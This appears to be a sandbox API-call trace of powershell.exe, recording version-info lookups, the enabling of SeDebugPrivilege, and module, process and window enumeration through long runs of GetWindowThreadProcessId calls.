	[0943.328] CoTaskMemFree (pv=0x287e60) 
	[0943.328] VerQueryValueW (in: pBlock=0x2ce72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14d928, puLen=0x14d920 | out: lplpBuffer=0x14d928*=0x2ce73e4, puLen=0x14d920) returned 1
	[0943.328] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0943.328] CoTaskMemAlloc (cb=0x66) returned 0x1f1070
	[0943.328] lstrcpyW (in: lpString1=0x1f1070, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0943.328] CoTaskMemFree (pv=0x1f1070) 
	[0943.328] VerQueryValueW (in: pBlock=0x2ce72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14d928, puLen=0x14d920 | out: lplpBuffer=0x14d928*=0x0, puLen=0x14d920) returned 0
	[0943.328] VerQueryValueW (in: pBlock=0x2ce72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14d928, puLen=0x14d920 | out: lplpBuffer=0x14d928*=0x0, puLen=0x14d920) returned 0
	[0943.328] VerQueryValueW (in: pBlock=0x2ce72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14d928, puLen=0x14d920 | out: lplpBuffer=0x14d928*=0x0, puLen=0x14d920) returned 0
	[0943.328] VerQueryValueW (in: pBlock=0x2ce72f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14d8f8, puLen=0x14d8f0 | out: lplpBuffer=0x14d8f8*=0x2ce738c, puLen=0x14d8f0) returned 1
	[0943.329] CoTaskMemAlloc (cb=0x204) returned 0x236d60
	[0943.329] VerLanguageNameW (in: wLang=0x0, szLang=0x236d60, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0943.331] CoTaskMemFree (pv=0x236d60) 
	[0943.331] VerQueryValueW (in: pBlock=0x2ce72f0, lpSubBlock="\\", lplpBuffer=0x14d948, puLen=0x14d940 | out: lplpBuffer=0x14d948*=0x2ce7318, puLen=0x14d940) returned 1
	[0943.336] GetCurrentProcessId () returned 0xd90
	[0943.342] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x14c870 | out: lpLuid=0x14c870*(LowPart=0x14, HighPart=0)) returned 1
	[0943.918] GetCurrentProcess () returned 0xffffffffffffffff
	[0943.919] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x14c890 | out: TokenHandle=0x14c890*=0x2d4) returned 1
	[0943.920] AdjustTokenPrivileges (in: TokenHandle=0x2d4, DisableAllPrivileges=0, NewState=0x2ceab68*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0943.922] CloseHandle (hObject=0x2d4) returned 1
	[0943.925] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xd90) returned 0x2d4
	[0943.935] EnumProcessModules (in: hProcess=0x2d4, lphModule=0x2ceabd0, cb=0x200, lpcbNeeded=0x14d8a8 | out: lphModule=0x2ceabd0, lpcbNeeded=0x14d8a8) returned 1
	[0943.938] GetModuleInformation (in: hProcess=0x2d4, hModule=0x13f370000, lpmodinfo=0x2ceae40, cb=0x18 | out: lpmodinfo=0x2ceae40*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0943.939] CoTaskMemAlloc (cb=0x804) returned 0x288f00
	[0943.939] GetModuleBaseNameW (in: hProcess=0x2d4, hModule=0x13f370000, lpBaseName=0x288f00, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0943.939] CoTaskMemFree (pv=0x288f00) 
	[0943.940] CoTaskMemAlloc (cb=0x804) returned 0x288f00
	[0943.940] GetModuleFileNameExW (in: hProcess=0x2d4, hModule=0x13f370000, lpFilename=0x288f00, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0943.940] CoTaskMemFree (pv=0x288f00) 
	[0943.941] CloseHandle (hObject=0x2d4) returned 1
	[0943.949] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xd90) returned 0x2d4
	[0943.950] GetExitCodeProcess (in: hProcess=0x2d4, lpExitCode=0x14d9d8 | out: lpExitCode=0x14d9d8*=0x103) returned 1
	[0944.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12ceb088, Length=0x20000, ResultLength=0x14d9a0 | out: SystemInformation=0x12ceb088, ResultLength=0x14d9a0*=0x4a050) returned 0xc0000004
	[0944.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d0b0b8, Length=0x4c850, ResultLength=0x14d9a0 | out: SystemInformation=0x12d0b0b8, ResultLength=0x14d9a0*=0x4a050) returned 0x0
	[0945.359] EnumWindows (lpEnumFunc=0x2af66ac, lParam=0x0) 
	[0945.361] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4d0
	[0945.361] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x558
	[0945.361] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4d0
	[0945.361] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4d0
	[0945.362] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4d0
	[0945.362] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x538
	[0945.362] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4d0
	[0945.362] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x778
	[0945.362] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x778
	[0945.362] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4d0
	[0945.362] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4d0
	[0945.362] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4d0
	[0945.362] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4d0
	[0945.362] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4d0
	[0945.363] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4d0
	[0945.363] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4d0
	[0945.363] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4d0
	[0945.363] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x460
	[0945.363] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4d0
	[0945.363] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4d0
	[0945.363] GetWindowThreadProcessId (in: hWnd=0x10bd6, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x2440
	[0945.363] GetWindowThreadProcessId (in: hWnd=0x10bb6, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x24d8
	[0945.364] GetWindowThreadProcessId (in: hWnd=0x10ba8, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1aa4
	[0945.364] GetWindowThreadProcessId (in: hWnd=0x10b74, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1ff0
	[0945.364] GetWindowThreadProcessId (in: hWnd=0x10b66, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1a84
	[0945.364] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1fb0
	[0945.364] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1e10
	[0945.364] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x23a8
	[0945.364] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1f24
	[0945.364] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x21ec
	[0945.364] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x2320
	[0945.364] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1fd4
	[0945.365] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1880
	[0945.365] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1b18
	[0945.365] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1d6c
	[0945.365] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x233c
	[0945.365] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x2368
	[0945.365] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x2124
	[0945.365] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x22f0
	[0945.365] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x22ac
	[0945.365] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1cdc
	[0945.366] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x10f0
	[0945.366] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1f18
	[0945.366] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x20a8
	[0945.366] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x2004
	[0945.366] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1f88
	[0945.366] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1f84
	[0945.366] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x2050
	[0945.366] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1e04
	[0945.366] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1ecc
	[0945.366] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1e64
	[0945.366] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1b58
	[0945.367] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1e94
	[0945.367] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1e28
	[0945.367] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1df8
	[0945.367] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1da8
	[0945.367] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1c70
	[0945.367] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x163c
	[0945.367] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1a10
	[0945.367] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x186c
	[0945.367] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1d74
	[0945.367] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4c8
	[0945.368] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1960
	[0945.368] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1ce4
	[0945.368] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1b24
	[0945.368] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x14e0
	[0945.368] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x17f0
	[0945.368] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x854
	[0945.368] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1268
	[0945.368] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1624
	[0945.368] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1b9c
	[0945.368] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x16f4
	[0945.369] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x145c
	[0945.369] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x17d0
	[0945.369] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1d28
	[0945.369] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xcb8
	[0945.369] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1190
	[0945.369] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x3a8
	[0945.369] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1bd0
	[0945.369] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1bfc
	[0945.369] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1a78
	[0945.369] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1b90
	[0945.369] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1b04
	[0945.370] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1b34
	[0945.370] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1b64
	[0945.370] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1bb0
	[0945.370] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1acc
	[0945.370] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1a2c
	[0945.370] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x19a8
	[0945.370] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1944
	[0945.370] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x18c8
	[0945.370] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x18ac
	[0945.370] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x18ec
	[0945.370] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1898
	[0945.371] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xc98
	[0945.371] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x153c
	[0945.371] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1808
	[0945.371] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x12a4
	[0945.371] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1740
	[0945.371] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x16c4
	[0945.371] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1820
	[0945.371] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x16ac
	[0945.371] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1858
	[0945.371] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1664
	[0945.371] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x10b4
	[0945.372] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x10ac
	[0945.372] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x10ec
	[0945.372] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1068
	[0945.372] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x17e0
	[0945.372] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x102c
	[0945.372] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x17a4
	[0945.372] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1050
	[0945.372] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1694
	[0945.372] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1770
	[0945.372] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1720
	[0945.373] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x165c
	[0945.373] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1578
	[0945.373] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x16c0
	[0945.373] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x161c
	[0945.373] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1638
	[0945.373] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x15c8
	[0945.373] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1554
	[0945.373] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1674
	[0945.373] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1520
	[0945.373] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x14bc
	[0945.373] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xf8c
	[0945.374] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xe9c
	[0945.374] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1434
	[0945.374] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x14ec
	[0945.374] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xfcc
	[0945.374] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x12ac
	[0945.374] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1484
	[0945.374] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x934
	[0945.374] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xc0c
	[0945.374] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xb08
	[0945.374] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x948
	[0945.375] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1178
	[0945.375] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x13e0
	[0945.375] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xcd0
	[0945.375] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x13fc
	[0945.375] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xdc8
	[0945.375] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xc18
	[0945.375] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xc2c
	[0945.375] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xa1c
	[0945.375] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1244
	[0945.375] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xdb0
	[0945.376] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1398
	[0945.376] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1358
	[0945.376] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1370
	[0945.376] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1340
	[0945.376] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x130c
	[0945.376] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x12c0
	[0945.376] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x12e4
	[0945.376] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1270
	[0945.376] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1298
	[0945.376] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x120c
	[0945.376] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x122c
	[0945.377] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x11c4
	[0945.377] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x11b0
	[0945.377] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1188
	[0945.377] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1148
	[0945.377] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1160
	[0945.377] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x10fc
	[0945.377] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xe34
	[0945.377] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xea4
